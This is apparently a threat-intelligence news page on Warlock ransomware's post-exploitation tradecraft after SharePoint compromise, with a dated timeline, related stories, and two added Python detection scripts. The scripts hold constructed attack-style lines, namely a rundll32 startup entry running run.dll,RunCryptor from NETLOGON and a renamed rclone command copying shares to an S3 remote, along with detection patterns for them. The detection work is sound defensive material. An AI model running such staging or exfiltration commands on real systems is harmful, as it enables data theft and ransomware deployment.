Warlock Ransomware Expands SharePoint Intrusions With Stealthier Post-Exploitation
Warlock ransomware operators have continued exploiting unpatched Microsoft SharePoint servers, but recent intrusions show a more mature post-exploitation playbook focused on persistence, lateral movement, and evasion after initial access. Trend Micro reported that the group now uses a bring-your-own-vulnerable-driver (BYOVD) technique built on the vulnerable NSecKrnl.sys driver, alongside tools such as TightVNC and the Yuze reverse proxy, to move more quietly across victim networks and reduce the chance of detection. The activity has affected organizations in the technology, manufacturing, and government sectors, with observed victims in the U.S., Germany, and Russia.
Incident details show the operators escalating to full domain compromise by abusing credentials, resetting the password of the built-in Administrator account, and adding users to the Domain Admins group. They used PsExec, PowerShell Remoting, an MSI-based deployment of TightVNC, and RDP-enabling utilities to maintain remote access and spread laterally, while web shells, tunneling, and other remote-control mechanisms provided persistence and command-and-control. The reporting indicates that Warlock's SharePoint exploitation path has stayed consistent, but the actions that follow compromise have been strengthened significantly, giving defenders a clearer set of behaviors to hunt for beyond the initial server exploit.
Timeline
Mar 16, 2026
Trend Micro publishes analysis of Warlock’s enhanced tradecraft
Trend Micro disclosed details of the January 2026 intrusion, describing Warlock’s improved post-exploitation methods, expanded toolset, and use of stealthy tunneling and BYOVD techniques.
Jan 20, 2026
Ransomware execution drops lockdatareadme.txt note
The attack’s impact phase culminated in ransomware execution across the environment, after which a ransom note named lockdatareadme.txt was dropped on affected systems.
Jan 19, 2026
Warlock stages ransomware via SYSVOL, NETLOGON, and Group Policy
The operators placed ransomware components in SYSVOL and NETLOGON shares and configured Active Directory Group Policy startup scripts to execute the RunCryptor export from run.dll across the enterprise.
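An added example of how a defender can audit that staging mechanism (this is not code from Trend Micro's report or from the operators' tooling). Group Policy keeps machine startup and shutdown scripts in scripts.ini under \\<domain>\SYSVOL\<domain>\Policies\<GUID>\Machine\Scripts\, as numbered CmdLine/Parameters pairs in [Startup] and [Shutdown] sections. The parser below reads that format and flags entries that launch rundll32, call a DLL export, or point at a SYSVOL/NETLOGON path outside a policy folder. The scripts.ini content is constructed; only run.dll and RunCryptor come from the timeline, and the GUID is the well-known Default Domain Policy GUID.

```python
r"""Audit a GPO scripts.ini for startup scripts that run a staged DLL export.

Added example, not code from Trend Micro or the Warlock operators. The
scripts.ini text below is constructed; run.dll and RunCryptor are the names
reported in the timeline.
"""
from __future__ import annotations

import configparser
import re
from dataclasses import dataclass


@dataclass
class ScriptEntry:
    section: str      # "Startup" or "Shutdown"
    index: int        # the <n> prefix shared by a CmdLine/Parameters pair
    cmdline: str      # <n>CmdLine: script or executable run as SYSTEM at boot
    parameters: str   # <n>Parameters: its arguments


def parse_scripts_ini(text: str) -> list[ScriptEntry]:
    """Parse scripts.ini text into entries, ordered by section and index."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.optionxform = str  # keep key case so "0CmdLine" is not lowercased
    cp.read_string(text.lstrip("\ufeff"))  # on disk the file is UTF-16 with a BOM
    key_re = re.compile(r"(\d+)(CmdLine|Parameters)")
    entries: list[ScriptEntry] = []
    for section in cp.sections():
        by_index: dict[int, dict[str, str]] = {}
        for key, value in cp.items(section):
            m = key_re.fullmatch(key)
            if m:
                slot = by_index.setdefault(int(m.group(1)), {"CmdLine": "", "Parameters": ""})
                slot[m.group(2)] = value.strip()
        for idx in sorted(by_index):
            entries.append(ScriptEntry(section, idx, by_index[idx]["CmdLine"],
                                       by_index[idx]["Parameters"]))
    return entries


# Scripts normally live in the policy's own Machine\Scripts\Startup folder and are
# referenced by bare name, so an absolute SYSVOL/NETLOGON path that is not under
# \Policies\ is itself unusual, independent of what it runs.
RULES = [
    (re.compile(r"(^|\\)rundll32(\.exe)?\b", re.I), "rundll32 used as the script"),
    (re.compile(r"\.dll\s*,\s*\w+", re.I), "DLL export invoked"),
    (re.compile(r"\\\\[^\\]+\\(sysvol|netlogon)\\(?!.*\\policies\\)", re.I),
     "payload staged on SYSVOL/NETLOGON outside a policy folder"),
]


def audit_entries(entries: list[ScriptEntry]) -> list[tuple[str, int, str, list[str]]]:
    """Return (section, index, full command, reasons) for each suspicious entry."""
    findings = []
    for e in entries:
        full = f"{e.cmdline} {e.parameters}".strip()
        reasons = [why for rx, why in RULES if rx.search(full)]
        if reasons:
            findings.append((e.section, e.index, full, reasons))
    return findings


# Constructed sample: entry 0 is a normal script inside the Default Domain Policy
# folder; entry 1 mirrors the staging described in the timeline.
SAMPLE_SCRIPTS_INI = r"""[Startup]
0CmdLine=\\corp.example\sysvol\corp.example\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Scripts\Startup\inventory.bat
0Parameters=
1CmdLine=rundll32.exe
1Parameters=\\corp.example\netlogon\run.dll,RunCryptor
[Shutdown]
0CmdLine=C:\Windows\System32\gpupdate.exe
0Parameters=/force
"""

if __name__ == "__main__":
    for section, idx, full, reasons in audit_entries(parse_scripts_ini(SAMPLE_SCRIPTS_INI)):
        print(f"[{section}] entry {idx}: {full}\n    " + "; ".join(reasons))
```

To run it against a real domain, read each `Policies\<GUID>\Machine\Scripts\scripts.ini` from SYSVOL (decoding it as UTF-16) and pass the text to parse_scripts_ini; a change to any of those files should also show up as a version bump on the policy's gpt.ini, which is a useful second signal for the same staging.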
Jan 18, 2026
Data is exfiltrated to an attacker-controlled S3 bucket
Before ransomware deployment, the intruders used a renamed rclone binary, TrendFileSecurityCheck.exe, to steal data from the victim network and transfer it to an attacker-controlled Amazon S3 bucket.
Jan 17, 2026
Warlock uses BYOVD to disable security tools
The attackers abused the vulnerable NSecKrnl.sys driver in a bring-your-own-vulnerable-driver technique, using a renamed loader called TrendSecurity.exe to impair security products across the environment.
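An added hunt that covers three of the behaviors described on this page: the Administrator password reset and Domain Admins membership change from the summary, the renamed rclone exfiltration (Jan 18), and the NSecKrnl.sys driver load (Jan 17). It is not code from Trend Micro's report. It reads exported Windows Security and Sysmon events as one flattened JSON object per line, using the EventData field names Windows and Sysmon emit (a Winlogbeat-style export nests these under EventData, so adjust the lookups for that layout). Host names, accounts, the bucket name and paths are made up; NSecKrnl.sys and TrendFileSecurityCheck.exe are the names from the timeline. The RID checks rely on the well-known RIDs 500 (built-in Administrator) and 512 (Domain Admins), which the page itself does not state. The rclone detection keys on the command line (subcommand plus a remote:path token or an rclone flag) rather than the file name, because renaming the binary is exactly what the operators did.

```python
r"""Hunt exported Security/Sysmon events for Warlock-style post-exploitation.

Added example, not from Trend Micro's report. Sample events are constructed;
driver and tool file names are those given in the timeline.
"""
from __future__ import annotations

import json
import re
from dataclasses import dataclass

VULNERABLE_DRIVERS = {"nseckrnl.sys"}  # from the report; extend from a LOLDrivers list in practice
RCLONE_SUBCOMMANDS = {"copy", "sync", "move", "copyto", "moveto", "ls", "lsd", "lsf"}
RCLONE_FLAGS = {"--config", "--transfers", "--checkers", "--progress", "-P",
                "--no-check-certificate", "--ignore-existing", "--bwlimit"}
# remote:path or :backend:path; a Windows drive (C:\) has one letter and a backslash
REMOTE_TOKEN = re.compile(r"^:?[A-Za-z][A-Za-z0-9_-]+:(?!\\)")


@dataclass
class Finding:
    rule: str
    host: str
    detail: str


def rid_of(sid: str) -> str:
    return sid.rsplit("-", 1)[-1]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def looks_like_rclone(cmdline: str) -> bool:
    """<exe> <rclone subcommand> ... with a remote token or rclone flag.
    Naive whitespace split; paths with spaces need real Windows quoting rules."""
    tokens = cmdline.split()
    if len(tokens) < 3 or tokens[1].lower() not in RCLONE_SUBCOMMANDS:
        return False
    rest = tokens[2:]
    has_remote = any(REMOTE_TOKEN.match(t) for t in rest)
    has_flag = any(t.split("=", 1)[0] in RCLONE_FLAGS or t.startswith("--s3-") for t in rest)
    return has_remote or has_flag


def hunt(lines) -> list[Finding]:
    findings: list[Finding] = []
    for line in lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        eid, chan = int(ev.get("EventID", 0)), ev.get("Channel", "")
        host, sysmon = ev.get("Computer", "?"), chan.startswith("Microsoft-Windows-Sysmon")
        if chan == "Security" and eid == 4724 and rid_of(ev.get("TargetSid", "")) == "500":
            findings.append(Finding("builtin-administrator-password-reset", host,
                                    f"{ev.get('SubjectUserName')} reset {ev.get('TargetUserName')}"))
        elif chan == "Security" and eid == 4728 and rid_of(ev.get("TargetSid", "")) == "512":
            findings.append(Finding("domain-admins-member-added", host,
                                    f"{ev.get('MemberName')} added by {ev.get('SubjectUserName')}"))
        elif sysmon and eid == 6:  # driver load
            image = ev.get("ImageLoaded", "")
            if basename(image) in VULNERABLE_DRIVERS:
                findings.append(Finding("byovd-known-vulnerable-driver", host, image))
            elif "\\system32\\drivers\\" not in image.lower():
                findings.append(Finding("driver-loaded-from-unusual-path", host, image))
        elif sysmon and eid == 1:  # process creation
            cmd = ev.get("CommandLine", "")
            if looks_like_rclone(cmd):
                renamed = basename(ev.get("Image", "")) != "rclone.exe"
                findings.append(Finding("rclone-renamed" if renamed else "rclone", host, cmd))
    return findings


S = "Microsoft-Windows-Sysmon/Operational"
_SAMPLE_EVENTS = [  # constructed
    {"Channel": "Security", "EventID": 4724, "Computer": "DC01", "SubjectUserName": "svc_sharepoint",
     "TargetUserName": "Administrator", "TargetSid": "S-1-5-21-1111111111-2222222222-3333333333-500"},
    {"Channel": "Security", "EventID": 4728, "Computer": "DC01", "SubjectUserName": "Administrator",
     "TargetUserName": "Domain Admins", "TargetSid": "S-1-5-21-1111111111-2222222222-3333333333-512",
     "MemberName": "CN=svc_backup,CN=Users,DC=corp,DC=example"},
    {"Channel": "Security", "EventID": 4728, "Computer": "DC01", "SubjectUserName": "helpdesk1",
     "TargetUserName": "VPN Users", "TargetSid": "S-1-5-21-1111111111-2222222222-3333333333-1105",
     "MemberName": "CN=jdoe,CN=Users,DC=corp,DC=example"},
    {"Channel": S, "EventID": 6, "Computer": "FS01", "ImageLoaded": "C:\\Windows\\Temp\\NSecKrnl.sys"},
    {"Channel": S, "EventID": 6, "Computer": "FS01", "ImageLoaded": "C:\\Windows\\System32\\drivers\\tcpip.sys"},
    {"Channel": S, "EventID": 1, "Computer": "FS01", "Image": "C:\\ProgramData\\TrendFileSecurityCheck.exe",
     "CommandLine": "TrendFileSecurityCheck.exe copy D:\\Shares\\Finance :s3:staging-bucket/finance "
                    "--config C:\\ProgramData\\r.conf --transfers 16 --no-check-certificate"},
    {"Channel": S, "EventID": 1, "Computer": "BK01", "Image": "C:\\Program Files\\rclone\\rclone.exe",
     "CommandLine": "rclone.exe sync C:\\Backups backups:nightly --transfers 4"},
    {"Channel": S, "EventID": 1, "Computer": "WS07", "Image": "C:\\Windows\\System32\\notepad.exe",
     "CommandLine": "notepad.exe C:\\notes.txt"},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in _SAMPLE_EVENTS)

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG.splitlines()):
        print(f"{f.rule:40} {f.host:6} {f.detail}")
```

The driver rule matches on file name only because that is all the page gives; in production, compare the Hashes field of Sysmon event 6 against a maintained vulnerable-driver hash list, since a renamed copy of the same driver defeats a name match just as a renamed rclone defeats an image-name match.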
Jan 16, 2026
Attackers expand persistence, lateral movement, and covert access
During the intrusion, the operators used PsExec, PowerShell Remoting, TightVNC, Velociraptor, VS Code CLI tunneling, Cloudflare Tunnel, Yuze, and RDP patching to move laterally and maintain multiple redundant access and command-and-control channels.
Jan 15, 2026
Warlock compromises a victim network in a January 2026 intrusion
In January 2026, Warlock gained access to a victim environment and remained inside for about 15 days. The intrusion ultimately resulted in full domain-level control and preparation for enterprise-wide ransomware deployment.
Dec 31, 2025
Warlock continues exploiting unpatched SharePoint servers for initial access
Warlock, also tracked as Water Manaul, continued using known Internet-facing Microsoft SharePoint vulnerabilities for intrusion, including CVE-2025-49706, CVE-2025-49704, CVE-2025-53770, and CVE-2025-53771. Researchers linked the group’s initial access activity to SharePoint worker processes.
Related Stories

Warlock Ransomware Attacks US Firms via SharePoint Zero-Day Linked to Chinese CamoFei APT
Warlock ransomware was deployed against US firms through the exploitation of a zero-day vulnerability in Microsoft SharePoint, identified as CVE-2025-53770. The attacks have been attributed to the China-based CamoFei APT group, with evidence indicating that the threat actor leveraged the ToolShell exploit to gain initial access and deploy both Warlock and LockBit ransomware payloads. The campaign is notable for its use of DLL sideloading and a custom command-and-control framework referred to as `ak47c2`, as well as the bundling of multiple ransomware payloads in a single attack. Security researchers have traced the origins of the Warlock ransomware to activity dating back to 2019, suggesting that the group behind it is not new but has evolved its tactics. The operation stands out because, unlike most ransomware campaigns, which are typically associated with Russian actors, Warlock is linked to Chinese threat groups, including Budworm (APT27), Sheathminer (APT31), and Storm-2603. The attacks highlight a growing trend of Chinese APTs engaging in financially motivated ransomware operations targeting Western organizations.
1 month ago
Widespread Exploitation of Microsoft SharePoint ToolShell Vulnerability by Chinese-Linked Threat Actors
Hackers believed to be associated with China have exploited the ToolShell vulnerability (CVE-2025-53770) in Microsoft SharePoint, targeting a broad range of organizations across multiple continents. The vulnerability, which affects on-premises SharePoint servers, was disclosed as an actively exploited zero-day on July 20, 2025, prompting Microsoft to release emergency patches the following day. The flaw is a bypass for previously reported vulnerabilities (CVE-2025-49706 and CVE-2025-49704) and allows remote, unauthenticated attackers to execute code and gain full access to the file system. Multiple Chinese threat groups, including Budworm/Linen Typhoon, Sheathminer/Violet Typhoon, and Storm-2603/Warlock ransomware, have been linked to these attacks. Symantec reported that the ToolShell exploit was used to compromise organizations in the Middle East, South America, the United States, Africa, and Europe, with targets including government agencies, universities, telecommunications providers, and financial institutions. In one case, attackers exploited the vulnerability to plant webshells for persistent access, followed by the deployment of a Go-based backdoor named Zingdoor and the ShadowPad Trojan, both of which facilitate remote command execution and data exfiltration. Storm-2603, a financially motivated group, was observed deploying ransomware such as LockBit Black and WarLock/X2anylock by exploiting the same set of SharePoint vulnerabilities, with major activity noted on July 18, 2025. Their operations targeted organizations in Latin America and the APAC region, using a combination of public-facing application exploits and legitimate tools like PsExec for lateral movement and execution. The attacks highlight the critical risk posed by unpatched SharePoint servers, as attackers were able to gain initial access, establish persistence, and deploy sophisticated malware and ransomware payloads.
The campaigns demonstrate a high level of coordination and technical capability, leveraging zero-day exploits and advanced post-exploitation techniques. The breach of the National Nuclear Security Administration’s Kansas City National Security Campus further underscores the severity of these attacks, as foreign actors exploited the same SharePoint vulnerabilities to infiltrate a facility responsible for manufacturing critical components for US nuclear weapons. The incident at the Kansas City plant raised significant concerns about the security of federal IT and OT systems, especially those supporting national security functions. Despite the high-profile nature of the targets, responses from affected organizations and government agencies have been limited, with some declining to comment on the incidents. The rapid release of patches by Microsoft and the subsequent widespread exploitation illustrate the importance of timely vulnerability management and the need for robust security controls around public-facing applications. Security researchers have emphasized the necessity for organizations to validate their defenses against these specific TTPs and to continuously monitor for signs of compromise related to the ToolShell exploit. The attacks serve as a stark reminder of the persistent threat posed by state-linked actors and the critical importance of securing enterprise collaboration platforms like SharePoint.
3 weeks ago
Ransomware Attack Uncovers Ongoing Espionage in Russian Organizations
Two Russian organizations were simultaneously targeted by separate cyber attack groups, resulting in the exposure of a long-term espionage campaign. The first group, QuietCrabs, believed to be of Asian origin, focused on cyber espionage and maintained a stealthy presence within the victim networks. The second group, known as Thor, attempted to deploy LockBit and Babuk ransomware but was detected early, which inadvertently led to the discovery of QuietCrabs' ongoing activities. Both groups exploited known vulnerabilities in Microsoft SharePoint Server (CVE-2025-53770) and various Ivanti solutions (CVE-2024-21887, CVE-2025-4427, CVE-2025-4428, CVE-2023-38035) to gain initial access. QuietCrabs utilized an ASPX web shell, KrustyLoader malware, and the Sliver C2 implant for persistence and control, while Thor employed tools such as ADRecon, GodPotato, Secretsdump, Mimikatz, Tactical RMM, MeshAgent, and Rclone for lateral movement, privilege escalation, and data exfiltration. The investigation began after Thor's activity was detected, which prevented the ransomware deployment but also revealed the deeper, more persistent espionage threat posed by QuietCrabs. This incident highlights the risk of multiple, unconnected threat actors targeting the same organization and the potential for noisy attacks to expose more covert operations.
1 month ago